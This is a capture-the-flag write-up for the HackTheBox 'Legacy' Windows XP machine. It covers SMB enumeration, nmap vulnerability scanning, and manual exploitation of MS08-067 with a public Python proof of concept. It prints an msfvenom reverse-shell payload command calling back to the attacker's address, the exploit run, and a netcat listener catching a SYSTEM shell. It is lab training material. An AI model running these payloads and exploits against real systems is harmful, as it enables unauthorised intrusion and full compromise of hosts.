HackTheBox: Legacy
windows smb reverse-shell msfvenomLegacy is a Windows-based machine authored by ch4p, with an average rating of 4.4 stars.
// Lessons Learned
- Older versions of Windows (and probably Linux) lack some tools that are considered staples of security auditing, e.g
whoami. Having these available & ready to upload to the target, as well as knowing alternate methods of reaching the same outcome, can save a lot of time.
// Recon
┌──(kali㉿kali)-[~/HTB/legacy]
└─$ nmap -A -p- legacy.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-24 11:50 AEST
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.040s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4a:c1 (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-06-29T06:48:38+03:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.30 seconds
Nmap reveals this is a very old machine running Windows XP. Checking the identified services for unauthenticated access reveals:
1. rpc anonymous connections are enabled, but all commands appear disabled:
┌──(kali㉿kali)-[~/HTB/legacy]
└─$ rpcclient -U "" -N legacy.htb
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
...
2. SMB guest & anonymous access both appear disabled:
┌──(kali㉿kali)-[~/HTB/legacy]
└─$ smbmap -H legacy.htb -u 'guest' -p ''
[!] Authentication error on legacy.htb
┌──(kali㉿kali)-[~/HTB/legacy]
└─$ smbmap -H legacy.htb -u '' -p ''
[+] IP: legacy.htb:445 Name: unknown
// Initial Foothold
A machine this old is typically vulnerable to well-known and used exploits. Of the two services identified, SMB has a more chequered past when it comes to security, largely driven by attempts to keep the protocol & service backward-compatible with older implementations. Nmap can be used again to further explore this, by making use of the nmap scripting engine (NSE) against the relevant ports, executing all SMB vulnerability-checking scripts (any in the library that match smb-vuln-*):
┌──(kali㉿kali)-[~/HTB/legacy]
└─$ nmap -p 139,445 --script=smb-vuln-* legacy.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-24 12:32 AEST
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.026s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
Nmap done: 1 IP address (1 host up) scanned in 5.52 seconds
Nmap detects that the target is vulnerable to 2 SMB-related exploits:
- MS17-010 (also known as EternalBlue)
- MS08-067, a rpc-based remote code execution vulnerability, known to have been used in both the Conficker and Stuxnet attacks
Both vulnerabilities are easily exploitable via a number of Metasploit modules, but in the interest of doing something different we’ll try to exploit MS08-067 manually using a python3-based PoC. Once we have the repo cloned, we need to generate a shellcode payload using msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.17.230 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
The relevant flags used here are:
-p windows/shell_reverse_tcpto craft a Windows-compatible, stageless TCP-based reverse shell payload-b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"treats the specified characters as ‘bad’, filtering them from the output-f cuses the c ouput format-a x86targets the x86 (32-bit) architectured--platform windowsspecifies the target environment is Windows-based
Once the exploit script is modified with the output shellcode, execution is straightforward:
Usage: ms08-067.py <target ip> <os #> <Port #>
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
Nmap has already identified the operating system as XP, so we just need to enumerate through the various SP (Service Pack) variants until we find the right one, in this case Windows XP SP3 English (NX):
┌──(ms08067)─(kali㉿kali)-[~/github/jivoi/pentest/exploit_win]
└─$ python ms08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
and our attack-box listener catches a shell:
┌──(kali㉿kali)-[~/HTB/legacy]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.17.230] from (UNKNOWN) [10.10.10.4] 1037
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Since the shell is spawned as the nt authority\system user, there is no privilege escalation required, and both flags can be retrieved from their usual locations:
C:\WINDOWS\system32>cd C:\"Documents and Settings"
C:\Documents and Settings>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 <DIR> .
16/03/2017 09:07 <DIR> ..
16/03/2017 09:07 <DIR> Administrator
16/03/2017 08:29 <DIR> All Users
16/03/2017 08:33 <DIR> john
0 File(s) 0 bytes
5 Dir(s) 6.353.375.232 bytes free
C:\Documents and Settings>type john\Desktop\user.txt
type john\Desktop\user.txt
e69af***************************
C:\Documents and Settings>type Administrator\Desktop\root.txt
type Administrator\Desktop\root.txt
99344***************************
